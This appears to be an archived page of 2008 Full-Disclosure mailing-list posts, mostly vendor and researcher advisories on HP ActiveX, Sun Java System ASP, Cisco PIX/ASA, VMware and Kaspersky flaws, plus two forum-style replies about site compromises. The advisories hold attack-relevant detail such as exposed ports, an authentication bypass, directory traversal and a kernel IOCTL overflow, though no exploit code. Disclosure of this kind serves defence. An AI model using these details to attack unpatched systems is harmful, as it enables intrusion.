[Full-disclosure] CSIS-RI-0003: Multiple buffer overflow vulnerabilities in HP ActiveX

2008-06-04 Thread Dennis Rand 
Multiple buffer overflow vulnerabilities in HP Software

 

Hewlett-Packard (HP) is the world's largest PC dealer. According to IDC,
HP shipped 14.7 million units worldwide, a 23.3 percent year-over-year
growth and a 19 percent market share. 

 

PC's and laptops from HP are often shipped with preinstalled software
running on Microsoft Windows. The software is designed so the end-user
can keep drivers and HP software automatically updated. This is done
through a ActiveX plugin for Microsoft Internet Explorer.

 

CSIS have discovered multiple high-risk vulnerabilities in several parts
of that specific software. The affected component are found preinstalled
on a broad range of HP equipment but are also installed when a end user
visits HP webpage in order to access software updates such as
applications, drivers and firmware for multiple HP products.

 

We have discovered eight different vulnerabilities of which five should
be considered highly critical since they allow remote code execution.

 

At least five of these vulnerabilities have been confirmed to work in a
typical drive-by scenario. All it takes to exploit is to lure a user
into visiting a hostile and specifically crafted website. The attack
could also be done through SQL and HTML injection. This would allow, if
the system is found vulnerable, to run arbitrary code and take complete
control of the system or at least with the privileges of the logged on
user. In order for this scenario to work it would only require one of
the affected ActiveX objects to be installed and Active scripting to be
enabled in Microsoft Internet Explorer, which it is by default.

 

The vulnerability was discovered and reported by Dennis Rand from CSIS
Security Group.

 

HP has released an advisory and update to address these vulnerabilities.


HP Instant Support HPISDataManager.dll Running on Windows, Remote
Execution of Arbitrary Code

 

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c
01422264

 

Technical advisory with PoC can be downloaded here:

 
http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages File Creation Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of a file creation vulnerability in Sun
Microsystem's Java System Active Server Pages allows attackers to
execute arbitrary code with root privileges.

The vulnerability exists within a file included by several ASP
applications. This file provides a function that will write the
contents contained within its first parameter to a file specified by
its second parameter. Several ASP applications allow an attacker to
control both the content and the location of the file written.

III. ANALYSIS

Exploitation allows an attacker to create, or append to, arbitrary files
on the system with root privileges. No authentication is required to
reach the affected ASP applications. The attacker only needs to be able
to establish a session with the administration server on TCP port 5100.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

Additionally, removing the affected ASP applications will prevent
exploitation.

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2401 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Buffer Overflow Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Sun
Microsystem's Java System Active Server Pages allows attackers to
execute arbitrary code in the context of the ASP server.

The vulnerability exists within the request handling code within the ASP
server. An attacker supplied string is copied into a fixed size stack
buffer without first validating that there is sufficient space
available. By supplying a specially crafted request, an attacker can
cause a stack-based buffer overflow.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the ASP server. This vulnerability can be reached from a normal web
server, usually on TCP port 80, configured to pass requests for ASP
applications through the ASP server. No authentication is required to
exploit this vulnerability. If this service is configured to run with
root privileges it is possible to gain complete control over the
affected system.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

However, configuring the ASP server to run with reduced privileges can
help prevent a complete compromise. This can be accomplished via the
"Inherit user security" setting or setting a user and group to run with
when using the "Defined user security" mode.

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2404 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Information Disclosure Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of an information disclosure vulnerability in Sun
Microsystem's Java System Active Server Pages allows attackers to
obtain sensitive information.

This vulnerability exists due to the placement of the password and
configuration data within the application server root directory. By
making requests for specific, sensitive documents an attacker could
obtain the configuration or password hashes of allowed users.

III. ANALYSIS

Exploitation allows an attacker to gain sensitive information from the
server. No authentication is required to reach the affected ASP
applications. The attacker only needs to be able to establish a session
with the administration server on TCP port 5100.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2402 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Command Injection Vulnerabilities

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of multiple command injection vulnerabilities in Sun
Microsystem's Java System Active Server Pages allows attackers to
execute arbitrary code with root privileges.

These vulnerabilities exist within several ASP applications that execute
shell commands. The problem lies in the fact that these applications do
not filter or escape the parameters passed to these commands. By
inserting shell meta-characters into an HTTP request, an attacker is
able to execute arbitrary shell commands.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands with
elevated privileges. Since this server runs with root privileges, an
attacker could gain complete control of the affected the system.

Note that authentication is required to reach these ASP applications via
the administration server on TCP port 5100. However, several methods of
bypassing and circumventing authentication have been discovered,
rendering that requirement irrelevant.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

Removing the affected ASP applications from the system can prevent
exploitation of these vulnerabilities.

Additionally, using firewalls to limit access to the administration
server (TCP port 5100) and the ASP application server (TCP port 5102)
can help mitigate these issues.

VI. VENDOR RESPONSE

Sun Microsystems has addressed these vulnerabilities with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2405 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/11/2007  Initial vendor notification
05/11/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

One of these vulnerabilities was reported to iDefense by an anonymous
researcher. Further research by Joshua J. Drake (iDefense Labs)
uncovered an additional vulnerability.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Directory Traversal Vulnerabilities

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of multiple directory traversal vulnerabilities in
Sun Microsystem's Java System Active Server Pages allows attackers to
obtain the contents of, and delete, sensitive files on the system.

Both vulnerabilities exist within ASP applications included with the
product. When accessed via the administration server, the ASP engine
does not prevent directory traversal using the "../" construct. By
supplying a specially crafted HTTP request to one of the affected ASP
applications, an attacker is able to read from arbitrary files.

One of the applications will disclose only the first and third lines of
the file. Once the application is finished processing the file, it will
delete it.

III. ANALYSIS

Exploitation allows an attacker to gain sensitive information from the
server. No authentication is required to reach the affected ASP
applications. The attacker only needs to be able to establish a session
with the administration server on TCP port 5100.

Since the server process runs with root privileges, an attacker could
obtain the contents of, or delete, any file on the system. It is
interesting to note that attempting to exploit these vulnerabilities
via the web server results in an error as shown below.

  [Fri Feb 23 18:16:49 2007] Server object, 80004005, ASP 0175~Disallowed
Path Characters~The '..' characters are not allowed in the Path parameter
for the MapPath method.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of these vulnerabilities, disable
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

Additionally, removing the affected ASP applications will prevent
exploitation of these vulnerabilities.

VI. VENDOR RESPONSE

Sun Microsystems has addressed these vulnerabilities with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2403 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/04/2007  Initial vendor notification
04/05/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of these vulnerabilities wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Authorization Bypass Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 03, 2008

I. BACKGROUND

Sun Java System Active Server Pages is a multi-platform ASP application
server. It provides provides ASP (Active Server Pages) functionality to
a web server. More information is available at the following URL.

http://www.sun.com/software/chilisoft/index.xml

II. DESCRIPTION

Remote exploitation of design error in Sun Microsystem's Java System
Active Server Pages allows attackers to bypass administration server
authentication mechanisms.

The vulnerability exists due to improper design of the ASP application
server. The administration application server exists as a stand-alone
service that listens on TCP port 5102. By connecting directly to this
service and making requests, attackers are able to bypass
authentication mechanisms introduce by the administration HTTP server.

III. ANALYSIS

Exploitation allows an attacker to bypass authentication restrictions
imposed by the HTTP server. No authentication is required to
communicate with the affected administration application server. The
attacker only needs to be able to establish a session with the
administration application server on TCP port 5102.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability within
version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server
Pages. Older versions are suspected to be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, disable
administration server by executing the following command as the 'root'
user.

  # /opt/casp/admtool -e

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability with the release of
version 4.0.3 of Sun Java System Active Server Pages. For more
information, refer to Sun Alert 238184 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2406 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/11/2007  Initial vendor notification
05/11/2007  Initial vendor response
06/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metasploit - Hack ?

2008-06-04 Thread n3td3v 
On Mon, Jun 2, 2008 at 6:57 PM, H D Moore <[EMAIL PROTECTED]> wrote:
> Looks like someone is doing ARP poisoning at the ISP level. The actual
> metasploit.com server(s) are untouched, but someone is still managing to
> MITM a large portion of the incoming traffic. To make things even more
> fun, its cooinciding with a DoS attack (syn floods) on most of the open
> services.
>
> If you are worried about the the Metasploit Framework source code being
> MITM'd during SVN checkouts, use the SSL version of the SVN tree:
>
> $ svn co https://metasploit.com/svn/framework3/trunk/
>
> -HD
>
>
> On Monday 02 June 2008, Jacques Erasmus wrote:
>> Seems like the metasploit site has been hacked.
>
>

I found this post [1] on my news group it sounds like an awful
coincidence though.

[1] http://groups.google.com/group/n3td3v/browse_thread/thread/41b832968eacf1d9

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread n3td3v 
On Tue, Jun 3, 2008 at 12:26 AM, kat <[EMAIL PROTECTED]> wrote:
> Brazil!
>

No, infact not, but Zone-H rats have been able to shed light on the
origin of the attackers.

http://www.zone-h.org/content/view/14948/1/

I can't believe I just gave this site hits, but it helps solve the mystery!!!

The day Zone-H closes shop, the day I party like a mother fo!

All the best,

n3td3v

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA

2008-06-04 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and
Cisco ASA

Document ID: 105444

Advisory ID: cisco-sa-20080604-asa

http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml

Revision 1.0

For Public Release 2008 June 04 1600 UTC (GMT)

- -

Summary
===

Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive
Security Appliances and Cisco PIX Security Appliances. This security
advisory outlines details of these vulnerabilities:

  * Crafted TCP ACK Packet Vulnerability
  * Crafted TLS Packet Vulnerability
  * Instant Messenger Inspection Vulnerability
  * Vulnerability Scan Denial of Service
  * Control-plane Access Control List Vulnerability

The first four vulnerabilities may lead to a denial of service (DoS)
condition and the fifth vulnerability may allow an attacker to bypass
control-plane access control lists (ACL).

Note:  These vulnerabilities are independent of each other. A device
may be affected by one vulnerability and not affected by another.

Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of these
vulnerabilities are available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml

Affected Products
=

Vulnerable Products
+--

The following are the details about each vulnerability described
within this advisory.

Crafted TCP ACK Packet Vulnerability
+---

Cisco ASA and Cisco PIX devices are affected by a crafted TCP
acknowledgment (ACK) packet vulnerability. Software versions prior to
7.1(2)70 on the 7.1.x release, 7.2(4) on the 7.2.x release, and 8.0
(3)10 on the 8.0.x release are affected. Cisco ASA or Cisco PIX
security appliances running software version 7.0.x, or 8.1.x are not
vulnerable.

Cisco ASA and Cisco PIX devices running versions 7.1.x and 7.2.x with
WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability.
Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.

Note: Devices running IPv4 and IPv6 are affected by this
vulnerability.

Crafted TLS Packet Vulnerability
+---

Cisco ASA and Cisco PIX devices are affected by a crafted TLS request
vulnerability if the HTTPS server on the Cisco ASA or Cisco PIX
device is enabled and is running software versions prior to 8.0(3)9
on the 8.0.x release or prior to version 8.1(1)1 on the 8.1.x
release. Cisco ASA and Cisco PIX appliances running software versions
7.x are not vulnerable.

Instant Messenger Inspection Vulnerability
+-

Cisco ASA and Cisco PIX devices are affected by a crafted packet
vulnerability if Instant Messaging Inspection is enabled and the
device is running software versions prior to 7.2(4) on the 7.2.x
release, 8.0(3)10 on the 8.0.x release, or 8.1(1)2 on the 8.1.x
release. Devices running software versions in the 7.0.x and 7.1.x
releases are not vulnerable. Additionally, devices that do not have
Instant Messaging Inspection enabled are not vulnerable.

Note:  Instant Messaging Inspection is disabled by default.

Vulnerability Scan Denial of Service
+---

Cisco ASA and Cisco PIX devices are affected by a vulnerability
(port) scan denial of service vulnerability if the device is running
software versions prior to 7.2(3)2 on the 7.2.x release or 8.0(2)17
on the 8.0.x release. Cisco ASA and Cisco PIX devices running
software versions 7.0.x, 7.1.x, or 8.1.x are not vulnerable.

Control-plane Access Control List Vulnerability
+--

Cisco ASA and Cisco PIX devices are affected by a vulnerability if
the device is configured to use control-plane ACLs and if it is
running software versions prior to 8.0(3)9 on the 8.0.x release.
Devices running software versions 7.x or 8.1.x are not vulnerable.

Note:  Control-plane ACLs were first introduced in software version
8.0(2). The control-plane ACLs are not enabled by default.

The show version command-line interface (CLI) command can be used to
determine if a vulnerable version of the Cisco PIX or Cisco ASA
software is running. The following example shows a Cisco ASA Security
Appliance that runs software release 8.0(2):

ASA# show version

Cisco Adaptive Security Appliance Software Version 8.0(2)
Device Manager Version 6.0(1)

[...]

Customers who use the Cisco Adaptive Security Device Manager (ASDM)
to manage their devices can find the version of the software
displayed in the table in the login window or in the upper left
corner of the ASDM window.

Products Confirmed Not Vulnerable
+

The Cisco Firewall Services Module (FWSM) is not affected by

[Full-disclosure] VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues

2008-06-04 Thread VMware Security team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- ---
   VMware Security Advisory

Advisory ID:   VMSA-2008-0009
Synopsis:  Updates to VMware Workstation, VMware Player,
   VMware ACE, VMware Fusion, VMware Server, VMware
   VIX API, VMware ESX, VMware ESXi resolve critical
   security issues
Issue date:2008-06-04
Updated on:2008-06-04 (initial release of advisory)
CVE numbers:   CVE-2007-5671 CVE-2008-0967 CVE-2008-2097
   CVE-2008-2100 CVE-2006-1721 CVE-2008-0553
   CVE-2007-5378 CVE-2007-4772 CVE-2008-0888
   CVE-2008-0062 CVE-2008-0063 CVE-2008-0948
- ---

1. Summary:

   Several critical security vulnerabilities have been addressed
   in patches in ESX and in the newest releases of VMware's hosted
   product line.

2. Relevant releases:

   VMware Workstation 6.0.3 and earlier,
   VMware Workstation 5.5.6 and earlier,
   VMware Player 2.0.3 and earlier,
   VMware Player 1.0.6 and earlier,
   VMware ACE 2.0.3 and earlier,
   VMware ACE 1.0.5 and earlier,
   VMware Server 1.0.5 and earlier,
   VMware Fusion 1.1.1 and earlier

   VMware ESXi 3.5  without patches ESXe350-200805501-I-SG,
ESXe350-200805502-T-SG,
ESXe350-200805503-C-SG

   VMware ESX 3.5   without patches ESX350-200805515-SG, ESX350-200805508-SG,
ESX350-200805501-BG, ESX350-200805504-SG,
ESX350-200805506-SG, ESX350-200805505-SG,
ESX350-200805507-SG

   VMware ESX 3.0.2 without patches ESX-1004727, ESX-1004821, ESX-1004216,
ESX-1004726, ESX-1004722, ESX-1004724,
ESX-1004719, ESX-1004219

   VMware ESX 3.0.1 without patches ESX-1004186, ESX-1004728, ESX-1004725,
ESX-1004721, ESX-1004723, ESX-1004190,
ESX-1004189

   VMware ESX 2.5.5 without update patch 8
   VMware ESX 2.5.4 without update patch 19

NOTES: Hosted products VMware Workstation 5.x, VMware Player 1.x,
   and VMware ACE 1.x will reach end of general support
   2008-11-09. Customers should plan to upgrade to the latest
   version of their respective products.

   ESX 3.0.1 is in Extended Support and its end of extended
   support (Security and Bug fixes) is 2008-07-31. Users should plan
   to upgrade to at least 3.0.2 update 1 and preferably the newest
   release available before the end of extended support.

   ESX 2.5.4 is in Extended Support and its end of extended support
   (Security and Bug fixes) is 2008-10-08.  Users should plan to upgrade
   to at least 2.5.5 and preferably the newest release available before
   the end of extended support.

3. Problem description:

 a. VMware Tools Local Privilege Escalation on Windows-based guest OS

The VMware Tools Package provides support required for shared folders
(HGFS) and other features.

An input validation error is present in the Windows-based VMware
HGFS.sys driver.   Exploitation of this flaw might result in
arbitrary code execution on the guest system by an unprivileged
guest user.  It doesn't matter on what host the Windows guest OS
is running, as this is a guest driver vulnerability and not a
vulnerability on the host.

The HGFS.sys driver is present in the guest operating system if the
VMware Tools package is loaded.  Even if the host has HGFS disabled
and has no shared folders, Windows-based guests may be affected. This
is regardless if a host supports HGFS.

This issue could be mitigated by removing the VMware Tools package
from Windows based guests.  However this is not recommended as it
would impact usability of the product.

NOTE: Installing the new hosted release or ESX patches will not
  remediate the issue.  The VMware Tools packages will need
  to be updated on each Windows-based guest followed by a
  reboot of the guest system.

VMware would like to thank iDefense and Stephen Fewer of Harmony
Security for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2007-5671 to this issue.

VMwareProduct   Running  Replace with/
Product   Version   on   Apply Patch
    ===  =
Workstation   6.x   Windows  not affected
Workstation   6.x   Linuxnot affected
Workstation   5.x   Windows  5.5.6 build 80404 or later
Workstation   5.x   Linux5.5.6 build 80404 or later

Player2.x   Windows  not affected
Play

[Full-disclosure] iDefense Security Advisory 06.04.08: Kaspersky Internet Security IOCTL Stack Based Buffer Overflow Vulnerability

2008-06-04 Thread iDefense Labs 
iDefense Security Advisory 06.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 04, 2008

I. BACKGROUND

aspersky Internet Security Suite is a combination of Kaspersky
anti-virus, anti-spam, and personal firewall in one product. For more
information see the vendor's website at the following URL.

http://www.kaspersky.com/

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow in Kaspersky Lab's
Internet Security could allow an attacker to execute arbitrary code in
the context of the kernel.

The kl1.sys kernel driver distributed with Internet Security contains a
stack-based buffer overflow in the handling of IOCTL 0x800520e8. This
issue is caused by a failure to properly perform bounds checks on
user-supplied data that is passed to the swprintf function as a source
buffer. The destination buffer in this case is a 2,000 element
wide-character array. If the source buffer exceeds 2,000 characters, a
buffer overflow will occur leading to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel. An attacker would need local access to a vulnerable
computer to exploit this vulnerability.

IV. DETECTION

Kasperky Lab's Internet Security version 7.0.1.325 is confirmed to be
vulnerable to this issue. Previous versions are also suspected to be
vulnerable.

V. WORKAROUND

iDefense is unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Kaspersky Lab has addressed this vulnerability by releasing updated
anti-virus definition databases. For more information, refer the their
article at the following URL.

http://www.kaspersky.com/technews?id=203038727

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-1518 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/19/2008  Initial vendor notification
03/20/2008  Initial vendor response
